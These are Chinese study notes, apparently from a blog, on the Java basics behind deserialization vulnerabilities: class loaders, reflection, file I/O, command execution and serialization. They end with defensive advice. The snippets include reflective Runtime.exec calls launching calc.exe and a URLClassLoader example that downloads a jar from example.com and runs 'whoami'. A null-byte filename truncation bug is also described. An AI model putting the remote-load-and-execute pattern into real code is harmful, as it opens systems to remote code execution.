Java反序列化基础学习笔记<\/h1>

Java基础概念<\/h2>

Java核心概念<\/h3>

对象<\/strong>：类的实例，具有状态和行为。例如狗对象有颜色、名字、品种等状态，以及摇尾巴、叫、吃等行为。<\/li>
类<\/strong>：描述一类对象行为和状态的模板。<\/li>
方法<\/strong>：类的行为，包含逻辑运算、数据修改等操作。<\/li>

实例变量<\/strong>：每个对象特有的变量，决定对象状态，也称为类变量。<\/li> <\/ul>
Java类加载机制<\/h3>

Java依赖JVM实现跨平台，程序运行前被编译为字节码文件(.class)<\/li>
类初始化时调用java.lang.ClassLoader<\/code>加载类字节码<\/li>
类加载器采用双亲委派模型<\/strong>：当前类加载器→父类加载器→Bootstrap ClassLoader<\/li>
getClassLoader()<\/code>方法获取类加载器，Bootstrap ClassLoader加载的类返回null<\/li> <\/ul> ClassLoader核心方法<\/strong>：<\/p> loadClass<\/code>：加载指定Java类<\/li> findClass<\/code>：查找指定Java类<\/li> findLoadedClass<\/code>：查找JVM已加载的类<\/li> defineClass<\/code>：定义一个Java类<\/li> resolveClass<\/code>：链接指定的Java类<\/li> <\/ul> Java动态加载机制<\/h2> 类加载方式<\/h3> 类名.class<\/code><\/li> Class.forName("类名")<\/code><\/li> classloader.loadClass("类名")<\/code><\/li> <\/ol> 反射机制<\/h3> 反射允许程序在运行时检查和操作类、对象、属性和方法，核心功能包括：<\/p> 动态加载类<\/li> 实例化对象<\/li> 调用方法<\/li> 访问\/修改属性<\/li> <\/ul> 反射获取Class对象<\/strong>：<\/p> \/\/ 方式1：类的字面量 <\/span><\/span><\/span><\/span>Class<?><\/span> class1 =<\/span> java.<\/span>lang<\/span>.<\/span>Runtime<\/span>.<\/span>class<\/span>;<\/span> <\/span><\/span> <\/span><\/span>\/\/ 方式2：Class.forName() <\/span><\/span><\/span><\/span>String classname =<\/span> "java.lang.Runtime"<\/span>;<\/span> <\/span><\/span>Class<?><\/span> class2 =<\/span> Class.<\/span>forName<\/span>(<\/span>classname);<\/span> <\/span><\/span> <\/span><\/span>\/\/ 方式3：类加载器 <\/span><\/span><\/span><\/span>Class<?><\/span> class3 =<\/span> ClassLoader.<\/span>getSystemClassLoader<\/span>().<\/span>loadClass<\/span>(<\/span>classname);<\/span> <\/span><\/span><\/code><\/pre>反射调用内部类<\/strong>：将"."替换为"\("，如`com.adan0s.test\)<\/span>TestHello`<\/p> 反射获取和调用方法<\/h3> getMethods()<\/code>：获取当前类和父类的所有public方法<\/li> getDeclaredMethods()<\/code>：获取当前类的所有方法(不包括父类)<\/li> getMethod()<\/code>：获取指定public方法<\/li> getDeclaredMethod()<\/code>：获取当前类的指定方法(不包括父类)<\/li> <\/ul> 方法调用示例<\/strong>：<\/p> Method method =<\/span> clazz.<\/span>getDeclaredMethod<\/span>(<\/span>"methodName"<\/span>,<\/span> parameterTypes);<\/span> <\/span><\/span>method.<\/span>invoke<\/span>(<\/span>instance,<\/span> args);<\/span> <\/span><\/span><\/code><\/pre>反射获取和修改成员变量<\/h3> getFields()<\/code>：获取所有public成员<\/li> getDeclaredFields()<\/code>：获取当前类所有成员(不包括父类)<\/li> getField()<\/code>：获取指定public成员<\/li> getDeclaredField()<\/code>：获取当前类指定成员(不包括父类)<\/li> <\/ul> 成员变量操作<\/strong>：<\/p> Field field =<\/span> clazz.<\/span>getDeclaredField<\/span>(<\/span>"fieldName"<\/span>);<\/span> <\/span><\/span>field.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> \/\/ 对私有成员需要设置可访问 <\/span><\/span><\/span><\/span>Object value =<\/span> field.<\/span>get<\/span>(<\/span>instance);<\/span> \/\/ 获取值 <\/span><\/span><\/span><\/span>field.<\/span>set<\/span>(<\/span>instance,<\/span> newValue);<\/span> \/\/ 设置值 <\/span><\/span><\/span><\/code><\/pre>Java文件操作<\/h2> 文件系统<\/h3> java.io<\/code>：阻塞模式<\/li> java.nio<\/code>：非阻塞模式<\/li> <\/ul> 文件读取示例<\/h3> FileInputStream fileInputStream =<\/span> new<\/span> FileInputStream(<\/span>file);<\/span> <\/span><\/span>byte<\/span>[]<\/span> bytes =<\/span> new<\/span> byte<\/span>[<\/span>1024<\/span>];<\/span> <\/span><\/span>ByteArrayOutputStream outByte =<\/span> new<\/span> ByteArrayOutputStream();<\/span> <\/span><\/span>while<\/span> ((<\/span>a =<\/span> fileInputStream.<\/span>read<\/span>(<\/span>bytes))<\/span> !=<\/span> -<\/span>1<\/span>)<\/span> {<\/span> <\/span><\/span> outByte.<\/span>write<\/span>(<\/span>bytes,<\/span> 0<\/span>,<\/span> a);<\/span> <\/span><\/span>}<\/span> <\/span><\/span>System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>outByte.<\/span>toString<\/span>());<\/span> <\/span><\/span><\/code><\/pre>文件名空字节截断漏洞<\/h3> 影响版本：JDK < 1.7.40<\/li> 表现形式：文件名如test.txt\u0000.jpg<\/code>会被截断为test.txt<\/code><\/li> 修复方式：检测文件名是否包含空字节\u0000<\/code><\/li> <\/ul> 文件写入示例<\/h3> FileOutputStream fileOutputStream =<\/span> new<\/span> FileOutputStream(<\/span>file);<\/span> <\/span><\/span>fileOutputStream.<\/span>write<\/span>(<\/span>content.<\/span>getBytes<\/span>(<\/span>StandardCharsets.<\/span>UTF_8<\/span>));<\/span> <\/span><\/span>fileOutputStream.<\/span>flush<\/span>();<\/span> <\/span><\/span>fileOutputStream.<\/span>close<\/span>();<\/span> <\/span><\/span><\/code><\/pre>Java命令执行<\/h2> Runtime执行命令<\/h3> InputStream in =<\/span> Runtime.<\/span>getRuntime<\/span>().<\/span>exec<\/span>(<\/span>cmd).<\/span>getInputStream<\/span>();<\/span> <\/span><\/span>ByteArrayOutputStream byteArrayOutputStream =<\/span> new<\/span> ByteArrayOutputStream();<\/span> <\/span><\/span>byte<\/span>[]<\/span> buffer =<\/span> new<\/span> byte<\/span>[<\/span>1024<\/span>];<\/span> <\/span><\/span>int<\/span> bytesRead;<\/span> <\/span><\/span>while<\/span> ((<\/span>bytesRead =<\/span> in.<\/span>read<\/span>(<\/span>buffer))<\/span> !=<\/span> -<\/span>1<\/span>)<\/span> {<\/span> <\/span><\/span> byteArrayOutputStream.<\/span>write<\/span>(<\/span>buffer,<\/span> 0<\/span>,<\/span> bytesRead);<\/span> <\/span><\/span>}<\/span> <\/span><\/span>System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>new<\/span> String(<\/span>byteArrayOutputStream.<\/span>toByteArray<\/span>()));<\/span> <\/span><\/span><\/code><\/pre>ProcessBuilder执行命令<\/h3> ProcessBuilder pb =<\/span> new<\/span> ProcessBuilder(<\/span>cmd);<\/span> <\/span><\/span>Process process =<\/span> pb.<\/span>start<\/span>();<\/span> <\/span><\/span>InputStream in =<\/span> process.<\/span>getInputStream<\/span>();<\/span> <\/span><\/span>\/\/ 读取过程同上 <\/span><\/span><\/span><\/code><\/pre>反射调用Runtime执行命令<\/h3> Class<?><\/span> runtimeClass =<\/span> Class.<\/span>forName<\/span>(<\/span>"java.lang.Runtime"<\/span>);<\/span> <\/span><\/span>Method execMethod =<\/span> runtimeClass.<\/span>getMethod<\/span>(<\/span>"exec"<\/span>,<\/span> String.<\/span>class<\/span>);<\/span> <\/span><\/span>Constructor<?><\/span> constructor =<\/span> runtimeClass.<\/span>getDeclaredConstructor<\/span>();<\/span> <\/span><\/span>constructor.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span>execMethod.<\/span>invoke<\/span>(<\/span>constructor.<\/span>newInstance<\/span>(),<\/span> "calc.exe"<\/span>);<\/span> <\/span><\/span><\/code><\/pre>Java序列化与反序列化<\/h2> 序列化基础<\/h3> 实现java.io.Serializable<\/code>或java.io.Externalizable<\/code>接口的类可被序列化<\/li> serialVersionUID<\/code>：序列化版本控制标识<\/li> <\/ul> 序列化示例<\/h3> ByteArrayOutputStream byteout =<\/span> new<\/span> ByteArrayOutputStream();<\/span> <\/span><\/span>ObjectOutputStream objout =<\/span> new<\/span> ObjectOutputStream(<\/span>byteout);<\/span> <\/span><\/span>objout.<\/span>writeObject<\/span>(<\/span>object);<\/span> <\/span><\/span>objout.<\/span>flush<\/span>();<\/span> <\/span><\/span>objout.<\/span>close<\/span>();<\/span> <\/span><\/span>byte<\/span>[]<\/span> serializedData =<\/span> byteout.<\/span>toByteArray<\/span>();<\/span> <\/span><\/span><\/code><\/pre>反序列化示例<\/h3> ByteArrayInputStream bytein =<\/span> new<\/span> ByteArrayInputStream(<\/span>serializedData);<\/span> <\/span><\/span>ObjectInputStream in =<\/span> new<\/span> ObjectInputStream(<\/span>bytein);<\/span> <\/span><\/span>Object obj =<\/span> in.<\/span>readObject<\/span>();<\/span> <\/span><\/span><\/code><\/pre>反序列化要求<\/h3> 被反序列化的类必须存在<\/li> serialVersionUID<\/code>值必须一致<\/li> 不会调用类的构造方法<\/li> <\/ol> 安全注意事项<\/h2> 反序列化漏洞<\/h3> 攻击者可能构造恶意序列化数据，在反序列化时执行危险操作<\/li> 防御措施：不要反序列化不可信数据<\/li> 使用白名单验证反序列化的类<\/li> 使用ObjectInputFilter<\/code>过滤输入<\/li> <\/ul> <\/li> <\/ul> 命令执行风险<\/h3> 避免直接执行用户提供的命令<\/li> 对命令参数进行严格过滤和验证<\/li> 使用最小权限原则运行Java程序<\/li> <\/ul> 高级主题<\/h2> 自定义ClassLoader<\/h3> public<\/span> class<\/span> CustomClassLoader<\/span> extends<\/span> ClassLoader {<\/span> <\/span><\/span> @Override<\/span> <\/span><\/span> protected<\/span> Class<?><\/span> findClass(<\/span>String name)<\/span> throws<\/span> ClassNotFoundException {<\/span> <\/span><\/span> byte<\/span>[]<\/span> classBytes =<\/span> loadClassBytes(<\/span>name);<\/span> <\/span><\/span> return<\/span> defineClass(<\/span>name,<\/span> classBytes,<\/span> 0<\/span>,<\/span> classBytes.<\/span>length<\/span>);<\/span> <\/span><\/span> }<\/span> <\/span><\/span> \/\/ 实现loadClassBytes方法加载类字节码 <\/span><\/span><\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>URLClassLoader远程加载<\/h3> URL url =<\/span> new<\/span> URL(<\/span>"http:\/\/example.com\/Cmd.jar"<\/span>);<\/span> <\/span><\/span>URLClassLoader urlClassLoader =<\/span> new<\/span> URLClassLoader(<\/span>new<\/span> URL[]{<\/span>url});<\/span> <\/span><\/span>Class<?><\/span> cmdClass =<\/span> urlClassLoader.<\/span>loadClass<\/span>(<\/span>"Cmd"<\/span>);<\/span> <\/span><\/span>Method execMethod =<\/span> cmdClass.<\/span>getMethod<\/span>(<\/span>"exec"<\/span>,<\/span> String.<\/span>class<\/span>);<\/span> <\/span><\/span>execMethod.<\/span>invoke<\/span>(<\/span>null<\/span>,<\/span> "whoami"<\/span>);<\/span> <\/span><\/span><\/code><\/pre>总结<\/h2> Java反序列化安全涉及多个核心技术点：<\/p> 类加载机制和双亲委派模型<\/li> 反射API的动态调用能力<\/li> 序列化\/反序列化流程<\/li> 命令执行和文件操作的基础方法<\/li> <\/ol> 理解这些基础概念和机制是分析和防御Java反序列化漏洞的前提。在实际开发中，应特别注意这些功能的安全使用方式，避免引入安全风险。<\/p>